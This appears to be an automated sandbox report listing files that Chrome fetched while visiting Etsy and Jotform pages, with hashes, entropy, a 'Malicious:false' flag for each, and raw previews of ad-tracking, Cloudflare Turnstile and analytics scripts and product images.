                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script src="https://js.adsrvr.org/up_loader.1.1.0.js" type="text/javascript"></script>. <script type="text/javascript">. ttd_dom_ready( function() {. if (typeof TTDUniversalPixelApi === 'function') {. var universalPixelApi = new TTDUniversalPixelApi();. universalPixelApi.init("r09jr34", ["c6e9qnb"], "https://insight.adsrvr.org/track/up");. }. });. </script><img src="https://adservice.google.com/ddm/fls/z/dc_pre=CKewkJ-dn4kDFevvEQgdb0ctaQ;src=8666735;type=count0;cat=etsy_000;ord=1;num=3212989082534;npa=0;auiddc=*;ps=1;pcor=1578851005;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (47459)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):47460
                                                                                                                                                                              Entropy (8bit):5.397735966179774
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5D332FD1AE9FEB79A10425DFC3F84FE4
                                                                                                                                                                              SHA1:C7D7F9D2BF5EE08E242765803CDD3A223FE1CBFC
                                                                                                                                                                              SHA-256:2EA786910282DF7AE154A0011375CD1254ADBD8EF0E75EB62177ADA67DAF9611
                                                                                                                                                                              SHA-512:01CDAC8103290B0FC1BF9BE8EE3923BFA6B8AD7778FF6B4716E421D6BBB3382240D9316B9994D6F4EA87E67DA9791EB8E3E2A1AAF81DBD749B3C8D7778E15F20
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://challenges.cloudflare.com/turnstile/v0/b/62ec4f065604/api.js
                                                                                                                                                                              Preview:"use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var f=e[l](h),p=f.value}catch(s){n(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function h(p){Wt(l,o,c,h,f,"next",p)}function f(p){Wt(l,o,c,h,f,"throw",p)}h(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 170x135, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):6453
                                                                                                                                                                              Entropy (8bit):7.775448803404441
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:0D57F1BBD8375973AC1BDF800ADA7CA5
                                                                                                                                                                              SHA1:CF761CF1B178B719EBFE77CEE2A0BD1447D5A61C
                                                                                                                                                                              SHA-256:544AD3FF951F4BA8E7F38B6BEF6633E241AAC9F237CB1FDB7B0450D38A93C865
                                                                                                                                                                              SHA-512:F200A15CE386001AFC8DA6EC1EA842056F297A8ACD7132D0C5EEDD24BD1878B1AF29A934BBC50E9152967D63E62217F57535AE4F08C18A912A81521DACA2AF84
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd...........".........................................<........................!..1A.Qa."2q...#...BR..b....3r.&S..................................1........................!1A.Q."2aq...R....#Bbr.............?.......:..@..P>x.#.I#[...z.\+..,N...Z....5W.>...Sv.T.19..%.t.mT.%.R.XK.i......... ......
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):45335
                                                                                                                                                                              Entropy (8bit):7.993613302187713
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2541E1BB2EF3C59006EBE9EE395E0268
                                                                                                                                                                              SHA1:82EB5AE4EE1096219F31955454D62B61B47D9027
                                                                                                                                                                              SHA-256:6679A457BF4E95591A64F32BE890710289A6FEEA9BEF320746860CB03DEC55D9
                                                                                                                                                                              SHA-512:C54DBF8B6D6FF5A1F631DBB6BD9C3CD634685BB0ADDEAAD30F78D9B510419D0187640480E59A4FB0F89CA9144FADE1D816BC0B36419FAEEB92526ECFE45E0965
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/8118504/r/il/0732cc/1820919850/il_600x600.1820919850_h7pe.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2.... ...A@..Q.&$A#rPe..O....s......+.........7+...l..........a..">..!.A.O...s..A..v....L.....v.i..g..Z.R......>]......\.).I...#.Nj.......IR{..X.#:1...e^..@.%$......|..f.....&./a....~....ut.P....%.}.bvR..[..G.X.1P.........7..o.,.4..?...3..\......."?S.\D.).B......B}.V|.<b...j-...R.._..5.!>K..`D..;f@.$..M.GjDI....."_2......N....AC!P.'?x...@E............(~..b-..6x.BAh........#. ;C...h..|=T*..Pr.A...2.........;Y.(V%....>v..Z./.....e..n..t-..F.(.LX..e.$.3.2kr.......:=....?....8...`.Bx.>.'....t:.MXJ.=X..K..X.G...@B.fI...,'..,!X...x6..-... |.s.=...RB..~..(..F}..@- .....T..W...61.T.z..|.....+.....8......'3#..K..FQ<........S."}.*....i+.).lP....G<C..n'....@..+...j...........|...X.^.1h.+
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5253
                                                                                                                                                                              Entropy (8bit):7.703871294934752
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:22DE18664C52FD33531AC772355DE384
                                                                                                                                                                              SHA1:50AE57F0404C687CFA220B47FB89FB71FAB13375
                                                                                                                                                                              SHA-256:10FD7327D7F7534780EE79E79F7A0E1589F8C58052FF80A9BCDACB293C4A25AB
                                                                                                                                                                              SHA-512:43FA966A4E2CD98B447DC5B502151A3CDD6E2513CE543B50187AAC090722EF5E3478A170AFD6D2BACB44EFA025189BD7858FCFF7012C0D75EED926C6F1E0E961
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......d.d..".........................................7.........................!.1.."AQ.a.2q.#$B...R.3.....................................7.........................!1AQ"..aq.#$2B....%Rr...................?.0......|.y.H6..Hv..............`....{h_W.t...)%..!..#r..X.....z..k.{eE9J.....6...q.U-<j\3
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):276985
                                                                                                                                                                              Entropy (8bit):5.573669665781093
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:576EEEA0942B887C574E057D5829BE99
                                                                                                                                                                              SHA1:180EB592F2FE291CAA03450FEDB91A2E80085BA6
                                                                                                                                                                              SHA-256:76479C9F48CD9DC94F0E248AD2DE57FBC771530692C8EF6C7830626EE4DF6640
                                                                                                                                                                              SHA-512:62B1350BAF44EDE9218D35B5F4696234D0B59918519D65FBB0D5C77DA924898B4461CBCDEAE35601DDC1F7CEE5E7DC0BA7AB66F34D402C81BFB50B7E72139084
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":6,"vtp_value":true,"tag_id":11},{"function":"__ogt_referral_exclusion","priority":6,"vtp_includeConditions":["list","jotform\\.com"],"tag_id":13},{"function":"__ogt_session_timeout","priority":6,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":14},{"function":"__ogt_dma","priority":6,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":15},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 50x50, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2161
                                                                                                                                                                              Entropy (8bit):7.077872847612268
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:E9E2F22C2D7E99468F84EA3CA456EF1D
                                                                                                                                                                              SHA1:6CA8CD6E39873496B250C3C056AE6ED6E9D373CD
                                                                                                                                                                              SHA-256:1792DB7BCD868D39C1AE74B5373825B21F1F40382EC71ABAFCE450754072F59D
                                                                                                                                                                              SHA-512:E31B7D520A2BD7BB986188129D4BEB589782C8EC3C087C307E6626F79498B6B2F059E8FCE67CE4E0B7EE18995580B00364D6354C9146964198D8D41E10F41C08
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......2.2..".......................................1.........................!.1..AQ.."2aq....bc................................4..........................!12Aq.."4QRSa...3Brbs...............?..q...q^f...i$`....i..%..0E.@....&.6..'............F.a....5...c..A:..S...p Z..G.^.,.I/.....'.....*.8$.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):4661
                                                                                                                                                                              Entropy (8bit):7.890117899819348
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:953D3DC56CAC88164E3CDC045B85D2A6
                                                                                                                                                                              SHA1:7AFF092955DC1263FBAC8965F54E62D9662846B8
                                                                                                                                                                              SHA-256:091D872BA65C352881194E8EC6D9EA56A82BFFBF6AEFF146A2C208D2CB612727
                                                                                                                                                                              SHA-512:2496BB04CCFB47600CBD7729721B2C37015149270788CB05D33EB79BECA28391C524B467BBE1AE692BCFE4DBA9DB582BBC77CB5605FA32E570CD73CACC2F55FD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/24525563/r/il/397378/5690851796/il_300x300.5690851796_jpkw.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................'...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......,...,....pixi............ipma................../mdat....."%r...h4 2."Dh.a..P.s.-o.;j.6...n........................jK93..Ff3....4.....;....>Y=a..%.,....z.C.h+..<(...`.[.....4..@....f..'Q.%....._3.E.........j?.)..[<5.{YQ.A...+V8............c.....~z......:...~..N.F..;.h...GX....%.....Yn.T}....pk....#N...c.nG.T.]#...7...e..T..>..7D...B..;.Zv..............>.6a6..b.j..<..........Z.W.J..x..$......:.m8.. ...C...lWl....o.B'.S...o<x...F.tp"..[f3.u..B.......8..D..q...2?....H.[.A..R...A...\....8.f.c...S01.P._:...(r.[T...O..W.....,r...0.......p..J...s..qf.....<n(..../.........P.<G%..........l2.)....8V.\..c:....LX.....aMA..e....G./.K.C|..<v....xd..7.0.*g^.....T.....d..=....)I....8^.8...APS.....Hk........9.d.+y.4=..{..5}8....d.A......9QL..o5...^....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):702016
                                                                                                                                                                              Entropy (8bit):5.278463251584455
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D7E43DF12C4338953B722AF1AADF69AA
                                                                                                                                                                              SHA1:A6DE291968D9E95E5B76793DFF01760A32C8F8B2
                                                                                                                                                                              SHA-256:20752A23F0DCAC77E7E338E6B263451B1A77B8F68A667FA1793C896FB906735A
                                                                                                                                                                              SHA-512:C6494C646C83E7C71931ED025CBB7642C36C92C0ED942756EC6BA43F4C53A8E0EFA90D8C43F6000DDE60D77E1F08C8D0266B151793BA03E765C869F23ABF3201
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://cdn01.jotfor.ms/s/umd/71f13b1c800/for-form-branding-footer.js?v=3.3.57813
                                                                                                                                                                              Preview:!function(r,o){"object"==typeof exports&&"object"==typeof module?module.exports=o():"function"==typeof define&&define.amd?define([],o):"object"==typeof exports?exports["for-form-branding-footer"]=o():r["for-form-branding-footer"]=o()}(this,function(){return function(){var r={33726:function(r,o,a){r.exports=a(88957)},19386:function(r,o,a){"use strict";var t=a(95813),e=a(89896),l=a(96995),s=a(21172),c=a(17588),i=a(51114),d=a(49209),b=a(22158),p=a(44304),g=a(22971);r.exports=function(r){return new Promise(function(o,a){var h,v=r.data,n=r.headers,y=r.responseType;function u(){r.cancelToken&&r.cancelToken.unsubscribe(h),r.signal&&r.signal.removeEventListener("abort",h)}t.isFormData(v)&&delete n["Content-Type"];var m=new XMLHttpRequest;if(r.auth){var x=r.auth.username||"",f=r.auth.password?unescape(encodeURIComponent(r.auth.password)):"";n.Authorization="Basic "+btoa(x+":"+f)}var w=c(r.baseURL,r.url);function A(){if(m){var t="getAllResponseHeaders"in m?i(m.getAllResponseHeaders()):null;e(fun
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 170x135, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):11251
                                                                                                                                                                              Entropy (8bit):7.8817876353878935
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:B397E0611284E6EF28B72C772EEFC28F
                                                                                                                                                                              SHA1:E9E1F9DBD3F3EF51CC22D0814C36F7FE5FF7BBCC
                                                                                                                                                                              SHA-256:659073431312529EA5090AA5B9682DD5DD71F03EF220D3A8FA339D85BFE41CEF
                                                                                                                                                                              SHA-512:60064EFE499404434F3AFA584D88EEC48834A7D3C0E5D1D05602405C3EE60BCFE6712E252DA9D6187B4467E97EEEC3942B943CD95F1709577DEC77EEDC283A3A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd..........."........................................@.........................!.1."AQ..a2Bq...#Rb.$3r....S.....Cs.................................4......................!..1Aa.Qq."#2..3...$BRbr................?......%A.f..HN.k.@.....{....mq9..Ld..)...`:p.Q....J.9.%2(m..2.. .]Q.>.c.....q1...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):25317
                                                                                                                                                                              Entropy (8bit):7.948049848901264
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:861E31C85736870D3E0FA9A3452BB350
                                                                                                                                                                              SHA1:E6AAACE6980E5D504F18F4DA049D1A7E58BC5BF8
                                                                                                                                                                              SHA-256:84F18C0F8DF88DF4CEC53E9A8359616EE764E4018408B3A7D866A4BB2CD86DD1
                                                                                                                                                                              SHA-512:03FC40943A7D1DBD83A66484DB7A3867A2538B929864CD51224C17470A8391B6ED418CB287651127C954818DE5251DDCFBFE43BDB771BA435815FA32538D4136
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......,.,..".........................................@.........................!.1A."Q.a.2q..#B..R..$3b..4Cr.S...%T.................................8........................!.1A."Qaq..2...#BR.3r.....$b.............?..@M.....x... "08+.....D.;x.Y.N.....c#........Y.v. v.6..TU..<..5b.3......RQ!<.?
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 75x75, components 3
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):2607
                                                                                                                                                                              Entropy (8bit):7.576774227913044
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:E90B750E7AC75A9D4580FC2F7EBCF2A7
                                                                                                                                                                              SHA1:BB8D0ECE4D4A34643BC528BA0815E12868B12054
                                                                                                                                                                              SHA-256:D9151B40C39DF208D0FBD57908617D7812B93E6AD28AD1540CA835344EB6F7E4
                                                                                                                                                                              SHA-512:7837C8DA681C15F71949819B7F5A41D4866138AEDCD49AF44AEC901EE4CA98CB1810EDD4DB849AD2A3F5EF709E54CFB589AC6507EC188D00791164ACE2CB9DEA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/r/il/0b3db3/5471230819/il_75x75.5471230819_4kx0.jpg
                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.......................................................................K.K.."...............................................................................P..hf..7.j*`br......f..n.M.!WU.m..V.=....7....:n.PI.!.7.VA5.......FB...u..Y5..! ....q..V..o-....y.LC...lF.nG...#............................ !#0............N...g ..5.l..e........dY.F..'(.....*}.j.Z..b}9.W....-..6...6..-.XA.f8..!9L..E@5@.g+Y..4..E.......M...r.G..b....a...s_b.<.=i...`..UXJ.=l+].?..V~Z..(.z..JJ.. ....2!..d...^.B7......~,r.Y3.b..|.&v.9\..........:3<q.?............................. !"1A........?.s+....qc..#..W..E..v7<x.=...e..)`.&.4z7...."........................ A..."1B........?............)...,..y.N...n.;r=..jv.e.../g...6........................!1.AQ"2q.... #0a.3BR.4Cb............?..O........`....a....<G8.........b.....=...k.........:."...S.<.?b..$}9..Kq.N........t...wX.....CC...D......zF&"..*..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (5092), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5092
                                                                                                                                                                              Entropy (8bit):5.830925449323864
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:31345711D899A32A5CB69B860052B6B9
                                                                                                                                                                              SHA1:D74581ADF46ED85DA38F4B1376DB495B073EA50E
                                                                                                                                                                              SHA-256:C169D82B89B4C4EB07DEB1CDC9711D8F5BE5F994CF53FDB359025F9621101022
                                                                                                                                                                              SHA-512:D69643453C5C394D706C249796DE860D9DB3B7F174849D831BC1B0433D1EC2E8A53888D961FFFB6297F1EDC1183DA1FC85D6C2E988711FCD2E3EF652C4CCA076
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):119951
                                                                                                                                                                              Entropy (8bit):7.981333530329194
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6B6594FAB5EE5B344D4F6C5D20C5F71E
                                                                                                                                                                              SHA1:AD5AB6875BDED4FF6D3EA20CF833EED9A0CB86A8
                                                                                                                                                                              SHA-256:057F103E8301DD3F4ADA908B087DE0C16E2CCD84081AB1739E891E16D576947B
                                                                                                                                                                              SHA-512:69E3313BC7BE8837F8E3FDE282EFDB68925112D0F15767EE78D0787130CD66586CA5ECB9E6AD04F36044588394449A0F4A271EC3B8C9FB2A5DC7E27EB5B41DBD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X..".........................................Q..........................!1.."AQa.q..#2B...R.3br...$C.....%4Scs.&..DT.'Ut.................................4......................!1A..Qaq.."2...B.#R....3b..r............?..s...........-..ng..kLr..7Y"...9...9...z..L/$F..a...".HI.-..l.%R.I.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):23020
                                                                                                                                                                              Entropy (8bit):7.944429298115366
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D8B12D68D44BA18D4527E5276A7633D5
                                                                                                                                                                              SHA1:F933D87CCFE5A723D5759546FACDCD3909C14163
                                                                                                                                                                              SHA-256:F0FEF0504D0C6DC57FA1AE7EB99C00DC28C5A2AE798170707118B39D431CB0F2
                                                                                                                                                                              SHA-512:1889F9321EEA9FD2D3E2BE77598721B05224DAF77D737EEF803AF16595CB7C827728A94937B9717729C574D454E1ED2322C4F7497575DF0150188054640C0DD5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......,.,..".........................................D........................!.1AQ.."aq...2B.....#...Rb$3..r..C.Sc....................................1......................!1..AQa"q..2..#B.....Rr..............?...4m.....c.X.6=. ..]...}.R.7P......[R.q.....A.J.v..M.z.7L.a......,QY|...:.8..h....V
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):8522
                                                                                                                                                                              Entropy (8bit):7.957986567280274
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:87166AE595410E2AA00DAC81A6EE2C7B
                                                                                                                                                                              SHA1:1D7B66F350A0AA6FC823572C64BBBDCCACDA1418
                                                                                                                                                                              SHA-256:2E3A5376FA3C1F5ACF46CA6357930DA59EEA1585734E3B83271FED7C3661731B
                                                                                                                                                                              SHA-512:0A61B2A3D78ACA64ED6B462143E89DF0A68F09E04DC997686A2B2F0E9BD898D0037784B40D2E6237BEBC8AF19CE40F02EDFF26A0BA441E7E757D1988306C7C64
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/26318708/c/1234/981/395/907/il/f078af/5329632069/il_340x270.5329632069_m2ak.jpg
